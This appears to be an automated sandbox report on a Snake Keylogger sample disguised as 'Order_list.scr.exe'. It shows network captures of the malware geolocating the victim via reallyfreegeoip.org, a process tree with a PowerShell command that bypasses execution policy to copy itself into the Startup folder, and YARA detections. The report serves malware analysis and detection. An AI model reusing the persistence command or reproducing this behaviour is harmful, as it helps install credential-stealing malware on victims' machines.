2025-01-13 09:12:20 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074329 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nfzi2aL7etkZNyjFWrh05HITDIRrYZwI7RALDuXgV2qBmxJiHFRacW3YbcF9ML%2BUSN1w%2BW3oxtSzlPgnJv7RybmTUsMhM61k2%2FgsIwkp%2BmLy%2BM8j2SeGfR%2Fupjke96KUbPXEFDBZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014439a4f5a8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2025&rtt_var=769&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441975&cwnd=168&unsent_bytes=0&cid=cbecb7231ad04af6&ts=144&x=0"
2025-01-13 09:12:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:23 UTC	862	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074332 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ee2T%2BmqhSlYFNVFVMRTTP8%2B8j3OKNJgbIUNwS8MuHb34Sx9%2F4b7z15NZxghA%2BFRPrLVT1sx%2FO%2B2hw4rY3pOs7AK0oCeBLJYVYFpsixHFGwNZq4TkAg6nnwBJ8Y9zmpMvkr5eHt3L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443a879fb42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1614&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1709601&cwnd=240&unsent_bytes=0&cid=dc29bf3a07cecf9c&ts=1099&x=0"
2025-01-13 09:12:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:25 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074334 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmWQ%2FZb58Awxxg7ZGjJizV9Id6kcQKG5rXiXFaFKyZKTWxfvUxc9d0%2BLGBQCAiFL0t3%2BOe2szCouYBEw5TUsBuwLPdSpQPFpQNgMuCehhmY2QB1YJ9n0CtRI1Rh%2FTO%2FCH2GWfRS5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443b5bc4e7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1970&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1464393&cwnd=218&unsent_bytes=0&cid=8fc08793b912593f&ts=132&x=0"
2025-01-13 09:12:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:26 UTC	863	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074335 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wcWfsBlWsu%2FcnzZIL1Y158Y%2Fn%2FhS5VW%2B%2FAUSuhyp5R2O0j5xay59ac5%2FnlnUN3meSY%2BSy1YNl78vt85SoPfWfsIGGfhg4d5Nkad8GPn61HrLNpEFj42JpaoMZl6LlUaHYOiPQn4O"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443bdaa624414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=180&unsent_bytes=0&cid=7c3c7a5c11aa086f&ts=127&x=0"
2025-01-13 09:12:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 09:12:27 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074337 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLNWWZwNA3%2BlIbNBoNP%2B8XLA%2F2HPh29l5tnlEPb9UQ3BQOtgFvVB4QTJYkAUzG9Z%2Fat9ks5olAEUHnPAwbIIob9KysP%2BBbAm7XZ7OhJMPXOelHJvQRATyUsQtqF963QFSSFjAHm%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443c6abcf42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1741&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1643218&cwnd=240&unsent_bytes=0&cid=887a4d96c1bb1e3f&ts=135&x=0"
2025-01-13 09:12:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:29 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074338 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VT6XFULVmkDfAIhF1KEDnUVqvvtqGYtaspjB%2BshUAOHow8pZLJf3ZxafFmMqPKA2dDHRVZJfP4Ovm452U6kjcauzJl4i5OoBNcBV2qOhw%2FMHrwh42xKE8y5cuUU7wI5%2FNu5eW2ol"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443cede814414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1666&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1721698&cwnd=180&unsent_bytes=0&cid=6c2929b12a5741b3&ts=137&x=0"
2025-01-13 09:12:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49770	104.21.64.1	443	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 09:12:30 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 09:12:30 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2074339 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lukAFSvPapJZy4PkThVutNlEwVbVIuNCJIn4jPY%2FvwXNgrtNLxV1MoPXIRD96DOAtSqeiHRBCc3lHDUC7ujBWC%2FFe7O4rR04kvSaDiEeQXEkGXisrYDL2%2ByTuRAOHT7kikTW0h6B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901443d72cdc8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2026&rtt_var=773&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1403846&cwnd=168&unsent_bytes=0&cid=87a824b0204cef66&ts=156&x=0"
2025-01-13 09:12:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	04:12:01
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\Order_list.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order_list.scr.exe"
Imagebase:	0x240000
File size:	829'952 bytes
MD5 hash:	F614CD44A2CA0676523D3F9D23AE23B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	04:12:02
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:12:02
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:12:03
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\Order_list.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order_list.scr.exe"
Imagebase:	0xf80000
File size:	829'952 bytes
MD5 hash:	F614CD44A2CA0676523D3F9D23AE23B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:12:03
Start date:	13/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:12:15
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Imagebase:	0x4f0000
File size:	829'952 bytes
MD5 hash:	F614CD44A2CA0676523D3F9D23AE23B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	04:12:15
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:12:15
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:12:17
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Imagebase:	0x2b0000
File size:	829'952 bytes
MD5 hash:	F614CD44A2CA0676523D3F9D23AE23B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	85
Total number of Limit Nodes:	6

Executed Functions

Function 0093D3C9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0093D456
